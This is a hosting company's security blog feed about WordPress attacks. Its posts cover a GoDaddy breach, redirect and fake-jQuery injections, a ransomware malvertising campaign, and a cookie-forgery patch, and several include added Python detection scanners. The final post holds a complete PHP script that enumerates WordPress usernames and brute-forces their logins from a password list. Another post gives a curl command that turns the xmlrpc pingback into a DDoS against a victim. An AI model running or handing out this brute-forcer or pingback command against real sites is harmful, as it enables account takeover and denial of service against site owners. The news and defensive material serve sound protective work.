WordPress vulnerabilities | 捕夢網 Blog (https://blog.pumo.com.tw)
Experts in network security, information security services, cloud hosting, server leasing, server colocation, virtual hosting and website hosting. Feed last built Thu, 24 Feb 2022 01:45:39 +0000.

GoDaddy's WordPress hosting hacked, over a million customer email addresses leaked
https://blog.pumo.com.tw/archives/1446 | Tue, 23 Nov 2021 09:12:07 +0000

According to the filing GoDaddy submitted to the United States Securities and Exchange Commission (SEC) on the 22nd, the company's WordPress hosting service was attacked, and the attacker obtained the email addresses of up to 1.2 million GoDaddy customers as well as the default passwords of some site administrators.

GoDaddy's Managed WordPress lets customers build and manage websites; the service handles the hosting chores for GoDaddy customers, such as installing WordPress, daily automatic backups, updating WordPress core components, and server-level caching.

However, GoDaddy's SEC filing states that in early September the attacker used a compromised password to gain access to its provisioning system, and that on 17 November GoDaddy discovered an unauthorized third party attempting to access the Managed WordPress environment. On finding the suspicious intrusion it immediately locked the attacker out, then began an investigation and notified local law enforcement.

The attacker not only obtained the email addresses of up to 1.2 million GoDaddy customers but could also see those customers' default WordPress administrator passwords; the email addresses may expose the customers to phishing attacks. GoDaddy also said that for active customers the sFTP and database usernames and passwords were exposed, and that some customers' private keys were exposed as well; these private keys are used to prove a website's authenticity.

The GoDaddy team is working to resolve these issues by resetting the affected passwords and reissuing security certificates. The company is also contacting all customers affected by the attack with the specific details of this security breach.

Chinese-language source

English original source: GoDaddy Announces Security Incident Affecting Managed WordPress Service

Tags: #WordPress, #GoDaddy, #WordPress hosting, #phishing

The post GoDaddy's WordPress hosting hacked, over a million customer email addresses leaked first appeared on 捕夢網 Blog.

Hackers attack WordPress sites, injecting code into PHP files to redirect visitors to malicious sites
https://blog.pumo.com.tw/archives/527 | Wed, 01 Jun 2016 06:10:08 +0000

A security company recently found hackers attacking WordPress sites: they modify the PHP code of a WordPress site so that it redirects visitors to a malicious site.

Security firm Sucuri reported that the hackers gain access through vulnerabilities in older versions of WordPress or of WordPress plugins and inject 12 lines of malicious code into header.php. Sucuri notes that in some cases the hackers obtain an account by other means, log in normally through the WordPress login screen, and then plant the code with WordPress's built-in theme editor.


Besides WordPress, Sucuri also said that some Joomla sites were attacked, with the malicious code pasted into administrator/includes/help.php, although on a much smaller scale than WordPress.

Sucuri analysed the malicious code and found the attack simple but effective. Once a site is compromised there is a 15% chance that a visitor is redirected to the malicious site; the code also sets a cookie on the victim so that they are not redirected again within a year. Sucuri said that this malicious site is only an entry point: after landing there the visitor passes through several more redirects before reaching the final dangerous site, one of which poses as a download page for Adobe Flash or Java.

Because the PHP code is poorly written, it produces errors on some sites. The foreign outlet SoftPedia found 6,400 affected sites through a Google search, but the real number of infections is probably higher.

Source: http://unwire.pro/2016/05/08/wordpress-redirect-to-malicious-sites-by-php-injection/news/

Image source: https://pixabay.com

The post Hackers attack WordPress sites, injecting code into PHP files to redirect visitors to malicious sites first appeared on 捕夢網 Blog.

WordPress and Joomla websites get hacked with fake jQuery
https://blog.pumo.com.tw/archives/436 | Fri, 08 Apr 2016 06:38:26 +0000

Hackers use the popular name of jQuery library to inject malicious code into websites powered by WordPress and Joomla.

jQuery is a very popular JavaScript library. Its basic aim is to erase the differences between the JavaScript implementations of the various web browsers. If you have ever tried web coding you know how tedious it can be to make the code do the same thing in different browsers; sometimes it is a really big challenge. In such situations this library is very useful.

Of course it is only a matter of time until such a well-known library gets the attention of those who want to use it for purposes other than web coding. Fake jQuery injections have been very popular among hackers. And that brings us to one of the most popular infections of the last couple of months: the attack that injects a fake jQuery script into the head section of CMS websites powered by WordPress and Joomla.

What does it look like?

[Figure: the injected fake-jQuery script as it appears in the page source]

The script is located right before the </head> tag, so as a normal visitor you can't notice anything unless you look into the source code.

At first glance you see simple code that is not obfuscated. There are only a few variables and one IF statement which inserts another JavaScript source. The only thing that is changing is "var base =", which points to another hacked website that serves as a source of injected malicious script, which brings us to the point of hacked domains.

[Figure: some of the hacked domains that are used as a source for the malicious JS code]

The number of hacked domains is abnormally high, which is why this kind of attack was and still is very popular on a daily basis. From November 2015 we registered over 4.5 million users who encountered this infection. Malicious code was found in almost 70 million unique files on hacked websites.

The code starts with a 10 millisecond countdown. That is a common practice in injection-type code, although a delay longer than 10 milliseconds is more typical.

After that, it begins to take shape. As you can see, encodeURIComponent is used on almost every line. This function encodes special characters such as , / ? : @ & = + $ #.

[Figure: all declared variables]

[Figure: the IF condition with document.write]

The final condition checks if variables contain necessary values and after evaluation another source for script is inserted.

[Figure: example of the injected URL after decoding by decodeURIComponent]

This URL is then used to increase the SEO rank of other domains; using a referral page and backlinks makes it look more legitimate.

[Figure: simple chart showing activity for the last month]

[Figure: map showing which regions the malicious injection targets the most]

What if I am already hacked?

Start with your local environment

You may think that if the problem is on a website you should look for it there, but in many cases the source of the infection can be traced back to your local machine (desktop, notebook, etc.).

Start with a full scan of your OS. This advice extends to Windows, OS X, and Linux machines.

Scan your website

There are various ways to do this. You can use an online malware-scan tool, which is easy to use and a quick way to get basic information.

You can also scan with Avast Antivirus or another antivirus program. Do not forget to unhide all files and folders before running the scan.

Caution: Make sure you don't delete the system files. You want to be mindful of the various types of symptoms and how they affect your website and its visitors. For instance, malicious redirects can often be found at the root of your website in files like .htaccess, and index.php, while others will focus on the themes directory targeting index.php, header.php, footer.php, and functions.php. Some infections can even live in MySQL databases and leave no trace at all in the files themselves.
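
The paragraph above lists where redirect injections usually live, and the earlier Sucuri post describes the header.php variant (a random-chance redirect plus a one-year cookie) while this post describes the fake-jQuery script (10 ms setTimeout, a remote "var base =", encodeURIComponent and document.write). The following is an added example, not code from either post or from Avast or Sucuri: a Python scanner that walks a site tree and flags files carrying those traits. The trait regexes, the thresholds and the sample strings are my assumptions; a hit is a lead for manual review, not a verdict.

```python
import os
import re

# Traits of the fake-jQuery injection: callback fired after 10 ms, "var base ="
# pointing at a remote host, encodeURIComponent, and document.write of a script.
FAKE_JQUERY_TRAITS = [
    re.compile(r"setTimeout\s*\(.*?,\s*10\s*\)", re.S),
    re.compile(r"\bvar\s+base\s*=\s*['\"](https?:)?//"),
    re.compile(r"encodeURIComponent\s*\("),
    re.compile(r"document\.write\s*\("),
]
# Traits of the header.php injection from the Sucuri write-up: a random chance,
# a Location redirect, and a cookie that lasts about a year.
PHP_REDIRECT_TRAITS = [
    re.compile(r"\b(mt_)?rand\s*\("),
    re.compile(r"header\s*\(\s*['\"]Location:"),
    re.compile(r"setcookie\s*\([^;]*(31536000|86400\s*\*\s*365|365\s*\*\s*86400)"),
]
# (trait list, minimum matches): the JS varies a little, so 3 of 4 suffice.
FAMILIES = {"fake-jquery": (FAKE_JQUERY_TRAITS, 3), "php-redirect": (PHP_REDIRECT_TRAITS, 3)}

def score_text(text):
    """Return {family: matching trait count} for every family over its threshold."""
    hits = {}
    for family, (traits, minimum) in FAMILIES.items():
        n = sum(1 for t in traits if t.search(text))
        if n >= minimum:
            hits[family] = n
    return hits

def scan_tree(root):
    """Walk a site root; return {path: hits} for .php/.html/.js/.htaccess files worth a look."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.endswith((".php", ".html", ".js", ".htaccess")):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = score_text(fh.read())
            if hits:
                findings[path] = hits
    return findings
# Constructed samples (not real malware): the shape of each injection as the two
# posts describe it, with hosts in the reserved .invalid domain.
SAMPLE_FAKE_JQUERY = """<script type="text/javascript">
setTimeout(function() {
  var base = "http://hacked-site.example.invalid/", t = encodeURIComponent(document.title);
  if (base && t) { document.write('<script src="' + base + 'jquery.min.php?t=' + t + '"><\\/script>'); }
}, 10);
</script></head>"""
SAMPLE_HEADER_PHP = """<?php if (!isset($_COOKIE['seen']) && mt_rand(1, 100) <= 15) {
  setcookie('seen', '1', time() + 31536000, '/'); header('Location: http://entry.example.invalid/'); exit; } ?>"""
SAMPLE_CLEAN = '<?php wp_head(); ?>\n<script src="/wp-includes/js/jquery/jquery.js"></script>\n</head>'
```

Run scan_tree() against the document root of the site (for example the directory holding wp-config.php) and review every reported path by hand.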

Do a backup of what you still have

If your files and database are still there, postpone your investigation and make a backup first. Be sure to label it as the hacked-site backup, though. You never know when you may find a use for that hacked backup.

I can't log into my CMS admin panel

You should start with the basics: reset your password. If that doesn't help, you can use tools like phpMyAdmin or Adminer to log into your database directly, bypassing the admin login page and resetting your user in the users table.

There are two ways: Either you get a hash of your password and add this to the database directly, or edit your admin email and then try "forgot password".

Restore from your backup

When you have a clean backup and it is not too outdated, you are in a very good situation. Re-upload all your files and restore your database and you are good to go. Make sure you delete all of the existing files first, because you never know which file may contain pieces of malicious code.

What if I have no backup?

You have basically two choices.

  1. You can start a new fresh site from scratch, or
  2. You can attempt to manually locate and remove the malicious code.

The second choice is a very tedious and hard process with no guarantees. Even if you are an expert, chances of completely cleaning your site are low. You can spend days looking through files, removing small snippets of hacker code, but if you miss one bit, the entire hack can be replaced by the hacker in a second once the site goes online.

If you have not yet been hacked and have not backed up your site, do it right now.

What about your hosting provider?

You may think, why me? But there could be more websites with the same problem, especially if you use shared hosting. It is worth asking your hosting provider for advice. Hosting providers very commonly run a community forum alongside their services, and these forums are the best way to share your problem and experiences. They can also be the fastest way to deal with a problem, because more people can be involved.

Your hosting provider might also be able to confirm if a hack is an actual hack or a loss of service.

Update!

Once you are clean, don’t forget to update your installation. Older versions are more prone to hacks than newer versions.

Now that it is all over, start keeping regular backups of your database and files. If this ever happens again, you will be prepared.

Source: https://blog.avast.com/wordpress-and-joomla-users-get-hacked-be-aware-of-fake-jquery

Image source: https://pixabay.com/

The post WordPress and Joomla websites get hacked with fake jQuery first appeared on 捕夢網 Blog.

Ransomware spreads from WordPress to Joomla
https://blog.pumo.com.tw/archives/367 | Thu, 10 Mar 2016 02:23:23 +0000

A malvertising campaign that appeared on WordPress is now trying to expand its reach. Reports say the criminals are attempting to cross platforms and attack sites built on Joomla. According to security researcher Brad Duncan, writing on the Internet Storm Center (ISC) site, the hacker group behind the "admedia" campaign on WordPress has set its sights on a new target: researchers found them starting to attack the Joomla open-source content management system (CMS).

In January 2016, infected WordPress pages were injected with an admedia iframe that could not only install a backdoor on the visitor's computer but also redirect page visitors to a malicious domain hosting an exploit kit, leading to infection with the TeslaCrypt ransomware. According to Duncan, when the campaign was first discovered it planted the Nuclear exploit kit on target sites, but it has since switched to the Angler exploit kit. In addition, the criminals' gateway URLs have started using the "megaadvertize" domain.

The basic technique, however, is unchanged: the targeted site is compromised and the hacker's script is embedded in its .js files. Because the page needs those files to run its JavaScript, the user is redirected to the admedia gateway. In other words, the iframe the page generates opens a path from the compromised site to the exploit kit, which then plants the TeslaCrypt ransomware on the computer. Ransomware remains a very effective kind of malware for extorting money from unsuspecting victims, and its growth shows no sign of slowing.

Although the researchers say the number of infected Joomla sites is still nowhere near that of WordPress, site administrators should not let their guard down. Breaking into legitimate sites and using them as attack channels seems to be increasingly popular; because users trust those sites, it lets attackers infect many unsuspecting users. We recommend that site administrators patch their content management systems regularly and keep watch for the latest threats that could endanger their users.

Source: http://blog.trendmicro.com.tw/?p=16792

Image source: https://pixabay.com/

The post Ransomware spreads from WordPress to Joomla first appeared on 捕夢網 Blog.

WordPress updated to 3.8.2, fixing multiple vulnerabilities
https://blog.pumo.com.tw/archives/45 | Wed, 27 Jan 2016 05:45:34 +0000

While everyone's feeds were flooded with OpenSSL news, WordPress released an update.

WordPress 3.8.2 is now available for download. The latest version fixes several important security issues, so updating is recommended.

One important vulnerability fixed in WordPress 3.8.2 is a cookie forgery vulnerability (CVE-2014-0166). An attacker could exploit it to log in to a site by forging an authentication cookie. The vulnerability was discovered by WordPress security team member Jon Cave.

The second vulnerability is a privilege escalation (CVE-2014-0165) that allows users with the Contributor role to publish posts.

There is also a back-end injection vulnerability, and an XSS vulnerability caused by a third-party library used in the file uploader.

Code change for the injection fix: https://core.trac.wordpress.org/changeset/27917

It is a second-order injection.

The cookie forgery fix is in wp-includes/pluggable.php:

https://github.com/WordPress/WordPress/commit/7f001bfe242580eb18f98e2889aad4ab1b33301b

   $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);
   $hash = hash_hmac('md5', $username . '|' . $expiration, $key);
 
-  if ( $hmac != $hash ) {
+  if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) {
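
Review bot: the removed line compared the cookie's HMAC with PHP's loose `!=`, which type-juggles digit-only or `0e`-prefixed hex digests into numbers (so two different digests can compare equal) and, being a plain string compare, stops at the first differing byte, so its timing reveals how much of the expected value the caller has right. The added `hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key )` addresses both: the comparison is strict, and both sides are keyed-hashed first so the bytes actually compared are unpredictable to the caller. Two asks: add a comment saying why both values are re-hashed, because the line looks redundant and a later clean-up could revert it to `$hmac !== $hash`; and where the supported PHP floor allows it, `hash_equals()` (PHP 5.6 and later) is the purpose-built constant-time comparison and reads more clearly.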

The post WordPress updated to 3.8.2, fixing multiple vulnerabilities first appeared on 捕夢網 Blog.

Over 160,000 WordPress sites used for DDoS attacks
https://blog.pumo.com.tw/archives/39 | Tue, 26 Jan 2016 12:40:14 +0000

Any WordPress site with Pingback enabled (it is on by default) can be used to launch DDoS attacks against other servers.

Look at the following log entries:

74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"
121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com"
217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr"
193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de"
...

Notice that every request also carries a random query string such as /?3162504=9747583 to bypass caching.

 

Testing this attack method needs only a single curl command:

$ curl -D -  "www.anywordpresssite.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>www.anywordpresssite.com/postchosen</string></value></param></params></methodCall>'

To see whether your own site is being used in an attack, check your logs for entries like the following:

93.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:<?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?>\x0A<methodCall>\x0A<methodName>pingback.ping</methodName>\x0A<params>\x0A <param>\x0A  <value>\x0A   <string>http://fastbet99.com/?1698491=8940641</string>\x0A  </value>\x0A </param>\x0A <param>\x0A  <value>\x0A   <string>yoursite.com</string>\x0A  </value>\x0A </param>\x0A</params>\x0A</methodCall>\x0A"
94.102.63.238 - - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"

The recommended defence is to block the XML-RPC pingback function by adding the following code to your WordPress theme:

add_filter( 'xmlrpc_methods', function( $methods ) {
    unset( $methods['pingback.ping'] );
    return $methods;
} );
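
The post shows two views of the same abuse: requests with the cache-busting "/?digits=digits" query and a "WordPress/x.y; site" User-Agent when your server is the victim, and POSTs to xmlrpc.php carrying pingback.ping when your server is the reflector. The following is an added example, not code from the post: a Python log classifier that separates the two and counts the originating WordPress hosts and the pingback victims. The Apache combined-log format and the sample lines (modelled on the post's excerpts, with example hosts) are my assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache combined-log line; "rest" keeps any extra quoted fields such as the
# POSTREQUEST body logged in the post's second excerpt.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?P<rest>.*)$'
)
# Reflected pingback traffic hitting us: the cache-busting "/?<digits>=<digits>"
# query plus the pingback User-Agent "WordPress/<ver>; <originating site>".
CACHE_BUST_RE = re.compile(r"^/\?\d+=\d+$")
WP_UA_RE = re.compile(r"^WordPress/[\d.]+; (?P<site>https?://\S+)$")
# Our own xmlrpc.php being abused: a pingback.ping call whose first URL is the
# victim. The logged body may keep its XML tags or (as in the post) lose them,
# so the URL stops at whitespace, '<' or an escaped "\x0A" newline.
PINGBACK_TARGET_RE = re.compile(r"pingback\.ping.*?(?P<target>https?://[^\s<\\]+)", re.S)

def classify(line):
    """Return ('reflected', origin_host), ('outbound', victim_host) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    if m["method"] == "GET" and CACHE_BUST_RE.match(m["path"]):
        ua = WP_UA_RE.match(m["ua"])
        if ua:
            return ("reflected", urlsplit(ua["site"]).netloc)
    if m["method"] == "POST" and m["path"].endswith("/xmlrpc.php"):
        t = PINGBACK_TARGET_RE.search(m["rest"])
        if t:
            return ("outbound", urlsplit(t["target"]).netloc)
    return None

def summarize(lines):
    """Count abusing WordPress hosts (we are the target) and victims (we are the reflector)."""
    reflected, outbound = Counter(), Counter()
    for line in lines:
        kind, host = classify(line) or (None, None)
        if kind == "reflected":
            reflected[host] += 1
        elif kind == "outbound":
            outbound[host] += 1
    return reflected, outbound

# Constructed sample lines modelled on the post's excerpts, with example hosts.
SAMPLE_LOG = [
    '203.0.113.10 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://blog-a.example.com"',
    '203.0.113.11 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://blog-b.example.com"',
    '203.0.113.10 - - [09/Mar/2014:11:05:28 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://blog-a.example.com"',
    '203.0.113.12 - - [09/Mar/2014:11:06:01 -0400] "GET /?p=3162504 HTTP/1.1" 200 5120 "-" "WordPress/3.8; http://blog-c.example.com"',
    '198.51.100.7 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.example.net/?1698491=8940641</string></value></param></params></methodCall>"',
    '198.51.100.7 - - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\\x0A\\x0Apingback.ping\\x0A\\x0A http://victim.example.net/?7964015=3863899\\x0A yoursite.com\\x0A"',
]
```

The fourth sample line is a legitimate pingback (a real post URL, no cache-buster) and is deliberately not counted; on a live server call summarize(open("access.log")) and look at the largest counters.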

Reference:
http://drops.wooyun.org/news/1062


The post Over 160,000 WordPress sites used for DDoS attacks first appeared on 捕夢網 Blog.

Script for brute-forcing WordPress user passwords
https://blog.pumo.com.tw/archives/27 | Tue, 26 Jan 2016 10:06:29 +0000

When doing a penetration test you sometimes come across a WordPress blog; if the version is fairly recent and its plugins have no vulnerabilities, you can try brute-forcing usernames and passwords.

I wrote this with a foggy brain, so feel free to point out bugs; since it is PHP it runs rather slowly, and next time I release it I will combine it with hydra for the brute-forcing instead.

The approach is to enumerate usernames through the URL /?author=, first try each user with a password identical to the username, and then brute-force with the password file pass.txt in the same directory.

By default it fetches the first 10 users; you can change this yourself.

Usage:

php wordpress.php http://www.test.com

<?php
set_time_limit(0);
$domain = $argv[1];
$namearray = array();

// Enumerate usernames: /?author=N redirects to /author/<name>/ for an existing user
for ($i = 1; $i <= 10; $i++) {
    $url = $domain."/?author=".$i;
    $response = httprequest($url, 0);
    if ($response == 404) {
        continue;
    }
    $pattern = "/author\/(.*)\/feed/";
    if (preg_match($pattern, $response, $name)) {
        $namearray[] = $name[1];
    }
}

echo "共获取用户".count($namearray)."名用户\n";

echo "正在破解用户名与密码相同的用户:\n";

$crackname = crackpassword($namearray, "same");

// Strip the newline from each line, otherwise it is URL-encoded into the password
$passwords = file("pass.txt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);

echo "正在破解弱口令用户:\n";

if ($crackname) {
    $namearray = array_diff($namearray, $crackname);
}

crackpassword($namearray, $passwords);

function crackpassword($namearray, $passwords) {
    global $domain;
    $crackname = array();
    foreach ($namearray as $name) {
        $url = $domain."/wp-login.php";
        if ($passwords === "same") {
            $post = "log=".urlencode($name)."&pwd=".urlencode($name)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
            // A failed login returns the form with a login_error div; its absence means success
            $pos = strpos(httprequest($url, $post), 'div id="login_error"');
            if ($pos === false) {
                echo "$name $name"."\n";
                $crackname[] = $name;
            }
        } else {
            foreach ($passwords as $pass) {
                $post = "log=".urlencode($name)."&pwd=".urlencode($pass)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
                $pos = strpos(httprequest($url, $post), 'div id="login_error"');
                if ($pos === false) {
                    echo "$name $pass"."\n";
                }
            }
        }
    }
    return $crackname;
}

function httprequest($url, $post) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

    if ($post) {
        curl_setopt($ch, CURLOPT_POST, 1); // submit as POST
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }

    $output = curl_exec($ch);
    $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($httpcode == 404) {
        return 404;
    } else {
        return $output;
    }
}
?>
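
Seen from the server side, the script above leaves a recognisable trail: one client walking /?author=1, 2, 3 ... in order, then a burst of POSTs to wp-login.php that are answered with 200 (the form plus the login_error div the script checks for) until one is answered with a 302 to redirect_to. The following is an added example, not part of the post: a Python detector that profiles clients in an Apache combined log and flags that pattern. The log format, the thresholds and the constructed sample lines are my assumptions.

```python
import re
from collections import defaultdict

# Request line and status from an Apache combined-log entry (format assumed).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
AUTHOR_RE = re.compile(r"^/\?author=(\d+)$")

def profile_clients(lines):
    """Per client IP: author ids probed, wp-login.php POSTs, and how many of those
    got a redirect. A failed WordPress login returns 200 with the form (the script
    looks for its login_error div); success returns a 302, so that is the signal."""
    profiles = defaultdict(lambda: {"authors": set(), "logins": 0, "login_redirects": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        p = profiles[m["ip"]]
        a = AUTHOR_RE.match(m["path"])
        if m["method"] == "GET" and a:
            p["authors"].add(int(a.group(1)))
        elif m["method"] == "POST" and m["path"].endswith("/wp-login.php"):
            p["logins"] += 1
            if m["status"] == "302":
                p["login_redirects"] += 1
    return profiles

def flag_clients(profiles, min_authors=3, min_logins=10):
    """Return {ip: [reasons]} for clients whose pattern matches the script's behaviour."""
    flagged = {}
    for ip, p in profiles.items():
        ids = sorted(p["authors"])
        reasons = []
        # The script walks /?author=1..10 in order: a sequential run of ids
        # from a single client is the enumeration signature.
        if len(ids) >= min_authors and ids == list(range(ids[0], ids[0] + len(ids))):
            reasons.append("author enumeration")
        if p["logins"] >= min_logins:
            reasons.append("login brute force")
            if p["login_redirects"]:
                reasons.append("possible successful login")
        if reasons:
            flagged[ip] = reasons
    return flagged

def _line(ip, method, path, status):
    """One constructed log line; 301 is what /?author=N returns for an existing user."""
    return f'{ip} - - [26/Jan/2016:10:06:29 +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'

# Constructed sample: one client enumerates ten author ids (three exist), then sends
# twelve failed logins and one that succeeds; another client just logs in once.
SAMPLE_LOG = (
    [_line("203.0.113.5", "GET", f"/?author={i}", 301 if i <= 3 else 404) for i in range(1, 11)]
    + [_line("203.0.113.5", "POST", "/wp-login.php", 200) for _ in range(12)]
    + [_line("203.0.113.5", "POST", "/wp-login.php", 302)]
    + [_line("198.51.100.9", "GET", "/about/", 200), _line("198.51.100.9", "POST", "/wp-login.php", 302)]
)
```

The "possible successful login" reason is the one to act on first: it means the password list found a match and the account needs an immediate reset.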

Reference:
http://drops.wooyun.org/tools/601


The post Script for brute-forcing WordPress user passwords first appeared on 捕夢網 Blog.